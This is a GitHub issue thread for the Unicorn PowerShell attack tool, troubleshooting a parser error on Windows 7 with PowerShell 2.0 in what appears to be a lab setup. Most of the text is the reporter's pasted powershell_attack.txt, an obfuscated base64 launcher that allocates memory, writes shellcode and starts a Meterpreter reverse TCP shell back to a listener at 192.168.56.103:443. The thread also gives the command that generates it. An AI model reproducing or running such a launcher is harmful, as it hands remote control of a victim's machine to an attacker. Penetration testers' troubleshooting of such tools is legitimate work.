### ISSUE TITLE
MissingExpressionAfterOperator Parser Error with Powershell_attack.txt execution

### ISSUE THREAD

**Issue by manasmbellani** [trustedsec/unicorn#54]
Hi
I am using Kali Linux (IP: 192.168.56.103) as the C&C and a test Windows 7 x64 VM (192.168.56.201) as the client.

I run the following to generate the powershell_attack.txt and unicorn.rc command.

`python unicorn.py windows/meterpreter/reverse_tcp 192.168.56.103 443`

When I copy and paste the command in the client from powershell, the window disappears and I do not get a reverse meterpreter shell on the C&C. Then, I slightly modify the powershell_attack.txt from "-w 1" to "-w 0" to ensure that the window does not disappear and I can see the error. I get the following error:

```

Missing expression after unary operator '-'.
At line:1 char:2
+ - <<<< e''c JABlAGgAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG.......... <omitted tldr;>.........
    + CategoryInfo          : ParserError: (-:String) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : MissingExpressionAfterOperator

```

The original powershell_attack.txt file context is as shown below.

Thanks
Max

`powershell -w 1 -C "s''v Wtl -;s''v Om e''c;s''v CT ((g''v Wtl).value.toString()+(g''v Om).value.toString());powershell (g''v CT).value.toString() ('JABJAEkAIAA9ACAAJwAkAGUAaAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgA'+'cgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAG0AQQBrACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAZQBoACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHUAQgBxAGUAYwAgAD0AIAAwAHgAZABhACwAMAB4AGQANwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeABiAGIALAAwAHgANgA2ACwAMAB4ADIANwAsADAAeABiADQALAAwAHgAOQA2ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADgALAAwAHgAMQA0ACwAMAB4ADAAMwAsADAAeAA1ADgALAAwAHgA'+'NwAyACwAMAB4AGMANQAsADAAeAA0ADEALAAwAHgANgBhACwAMAB4ADkAMgAsADAAeAA4AGIALAAwAHgAYQBhACwAMAB4ADkAMwAsADAAeAA2ADIALAAwAHgAZQBjACwAMAB4ADIAMwAsADAAeAA3ADYALAAwAHgANQAzACwAMAB4ADIAYwAsADAAeAA1ADcALAAwAHgAZgAyACwAMAB4AGMAMwAsADAAeAA5AGMALAAwAHgAMQAzACwAMAB4ADUANgAsADAAeABlAGYALAAwAHgANQA3ACwAMAB4ADcAMQAsADAAeAA0ADMALAAwAHgANgA0ACwAMAB4ADEANQAsADAAeAA1AGUALAAwAHgANgA0ACwAMAB4AGMAZAAsADAAeAA5ADAALAAwAHgAYgA4ACwAMAB4ADQAYgAsADAAeABjAGUALAAwAHgAOAA5ACwAMAB4AGYAOQAsADAAeABjAGEALAAwAHgANABjACwAMAB4AGQAMAAsADAAeAAyAGQALAAwAHgAMgBkACwAMAB4ADYAZAAsADAAeAAxAGIALAAwAHgAMgAwACwAMAB4ADIAYwAsADAAeABhAGEALAAwAHgANAA2ACwAMAB4AGMAOQAsADAAeAA3AGMALAAwAHgANgAzACwAMAB4ADAAYwAsADAAeAA3AGMALAAwAHgAOQAxACwAMAB4ADAAMAAsADAAeAA1ADgALAAwAHgAYgBkACwAMAB4ADEAYQAsADAAeAA1AGEALAAwAHgANABjACwAMAB4AGMANQAsADAAeABmAGYALAAwAHgAMgBhACwAMAB4ADYAZgAsADAAeABlADQALAAwAHgANQAxACwAMAB4ADIAMQAsADAAeAAzADYALAAwAHgAMgA2ACwAMAB4ADUAMwAsADAAeABlADYA'+'LAAwAHgANAAyACwAMAB4ADYAZgAsADAAeAA0AGIALAAwAHgAZQBiACwAMAB4ADYAZgAsADAAeAAzADkALAAwAHgAZQAwACwAMAB4AGQAZgAsADAAeAAwADQALAAwAHgAYgA4ACwAMAB4ADIAMAAsADAAeAAyAGUALAAwAHgAZQA0ACwAMAB4ADEANwAsADAAeAAwAGQALAAwAHgAOQBmACwAMAB4ADEANwAsADAAeAA2ADkALAAwAHgANAA5ACwAMAB4ADIANwAsADAAeABjADgALAAwAHgAMQBjACwAMAB4AGEAMwAsADAAeAA1ADQALAAwAHgANwA1ACwAMAB4ADIANwAsADAAeAA3ADAALAAwAHgAMgA3ACwAMAB4AGEAMQAsADAAeABhADIALAAwAHgANgAzACwAMAB4ADgAZgAsADAAeAAyADIALAAwAHgAMQA0ACwAMAB4ADQAOAAsADAAeAAyAGUALAAwAHgAZQA2ACwAMAB4AGMAMwAsADAAeAAxAGIALAAwAHgAMwBjACwAMAB4ADQAMwAsADAAeAA4ADcALAAwAHgANAA0ACwAMAB4ADIAMAAsADAAeAA1ADIALAAwAHgANAA0ACwAMAB4AGYAZgAsADAAeAA1AGMALAAwAHgAZABmACwAMAB4ADYAYgAsADAAeABkADAALAAwAHgAZAA1ACwAMAB4ADkAYgAsADAAeAA0AGYALAAwAHgAZgA0ACwAMAB4AGIAZQAsADAAeAA3ADgALAAwAHgAZgAxACwAMAB4AGEAZAAsADAAeAAxAGEALAAwAHgAMgBlACwAMAB4ADAAZQAsADAAeABhAGQALAAwAHgAYwA1ACwAMAB4ADgAZgAsADAAeABhAGEALAAwAHgAYQA1ACwAMAB4AGUAYgAsADAA'+'eABjADQALAAwAHgAYwA2ACwAMAB4AGUANwAsADAAeAA2ADMALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAAxADcALAAwAHgANwAzACwAMAB4ADIANgAsADAAeAA3AGMALAAwAHgANgBiACwAMAB4ADQAMQAsADAAeABlADkALAAwAHgAZAA2ACwAMAB4AGUAMwAsADAAeABlADkALAAwAHgANgAyACwAMAB4AGYAMQAsADAAeABmADQALAAwAHgAMABlACwAMAB4ADUAOQAsADAAeAA0ADUALAAwAHgANgBhACwAMAB4AGYAMQAsADAAeAA2ADIALAAwAHgAYgA2ACwAMAB4AGEAMgAsADAAeAAzADUALAAwAHgAMwA2ACwAMAB4AGUANgAsADAAeABkAGMALAAwAHgAOQBjACwAMAB4ADMANwAsADAAeAA2AGQALAAwAHgAMQBkACwAMAB4ADIAMQAsADAAeABlADIALAAwAHgAMQA4ACwAMAB4ADEANwAsADAAeABiADUALAAwAHgAYwBkACwAMAB4ADcANQAsADAAeAAxAGYALAAwAHgAMgAyACwAMAB4AGEANgAsADAAeAA4ADcALAAwAHgANgAwACwAMAB4AGEAZAAsADAAeAA4AGQALAAwAHgAMAAxACwAMAB4ADgANgAsADAAeABmAGQALAAwAHgAYQAxACwAMAB4ADQAMQAsADAAeAAxADcALAAwAHgAYgBkACwAMAB4ADEAMQAsADAAeAAyADIALAAwAHgAYwA3ACwAMAB4ADUANQAsADAAeAA3ADgALAAwAHgAYQBkACwAMAB4ADMAOAAsADAAeAA0ADUALAAwAHgAOAAzACwAMAB4ADYANwAsADAAeAA1ADEALAAwAHgAZQBmACwAMAB4ADYA'+'YwAsADAAeABkAGUALAAwAHgAMAA5ACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgANwBiACwAMAB4AGMAMQAsADAAeAAzADYALAAwAHgAZAA5ACwAMAB4ADUAMQAsADAAeABhAGYALAAwAHgANwA4ACwAMAB4ADUAMQAsADAAeAA1ADYALAAwAHgANABmACwAMAB4ADMANgAsADAAeAA5ADIALAAwAHgAMQAzACwAMAB4ADQAMwAsADAAeABhAGUALAAwAHgANQAyACwAMAB4ADYAZQAsADAAeAAzADkALAAwAHgANwA4ACwAMAB4ADYAYwAsADAAeAA0ADQALAAwAHgANQA0ACwAMAB4ADgANAAsADAAeABmADgALAAwAHgANgAzACwAMAB4AGYAZgAsADAAeABkADMALAAwAHgAOQA0ACwAMAB4ADYAOQAsADAAeAAyADYALAAwAHgAMQAzACwAMAB4ADMAYgAsADAAeAA5ADEALAAwAHgAMABkACwAMAB4ADIAOAAsADAAeABmADIALAAwAHgAMAA3ACwAMAB4AGUAZQAsADAAeAA0ADYALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABlAGUALAAwAHgAOQA2ACwAMAB4AGEAZAAsADAAeAA4AGQALAAwAHgAZQBlACwAMAB4AGYAZQAsADAAeAAwADkALAAwAHgAZgA2ACwAMAB4AGIAYwAsADAAeAAxAGIALAAwAHgANQA2ACwAMAB4ADIAMwAsADAAeABkADEALAAwAHgAYgAwACwAMAB4AGMAMwAsADAAeABjAGMALAAwAHgAOAAwACwAMAB4ADYANQAsADAAeAA0ADMALAAwAHgAYQA1ACwAMAB4ADIAZQAsADAAeAA1ADAALAAwAHgAYQAzACwA'+'MAB4ADYAYQAsADAAeABkADAALAAwAHgAYgA3ACwAMAB4ADMANQAsADAAeAA1ADYALAAwAHgAMAA3ACwAMAB4AGYAMQAsADAAeAA0ADMALAAwAHgAYgA2ACwAMAB4ADkAYgA7ACQAdQBCAHEAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAdQBCAHEAZQBjAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAHUAQgBxACAAPQAgACQAdQBCAHEAZQBjAC4ATABlAG4AZwB0AGgAfQA7ACQAWgBjAD0AJABtAEEAawA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHUAQgBxACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAegBwAFoAPQAwADsAJAB6AHAAWgAgAC0AbABlACAAKAAkAHUAQgBxAGUAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJAB6AHAAWgArACsAKQAgAHsAJABtAEEAawA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFoAYwAuAFQAbwBJAG4AdAAzADIAKAApACsAJAB6AHAAWgApACwAIAAkAHUAQgBxAGUAYwBbACQAegBwAFoAXQAsACAAMQApAH0AOwAkAG0AQQBrADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABaAGMALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAEkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4A'+'QwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABJAEkAKQApADsAJABkAEMAcwAgAD0AIAAiAC0AZQAnACcAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAawBuAFIAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawBuAFIAIAAkAGQAQwBzACAAJABJAGMAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAZABDAHMAIAAkAEkAYwAiADsAfQA=')"`

**Comment by trustedsec** [comment]
Hmm, I can't seem to recreate, if I run the same on a windows 7 x64 bit, it executes properly on reverse_tcp...

**Comment by trustedsec** [comment]
you can just remove -w 1 to blank

**Comment by johnjohny1990** [comment]
hi
I generate payload with unicorn in kali 2016.when i run pwershell.bat  dont give any access to me .dont return session in kali.
i think your code dont work.
please help me .
thanks

**Comment by yoy33** [comment]
Hi
I had exactly the same problem on Windows 7 x64 (Powershell Version: 2.0)

```
Missing expression after unary operator '-'.
At line:1 char:2
```

But it works fine on Windows 10.

**Comment by trustedsec** [comment]
Ahhh, maybe thats an issue. Let me take a look then, thanks.

**Comment by trustedsec** [comment]
fixed in 2.9.2, thanks!
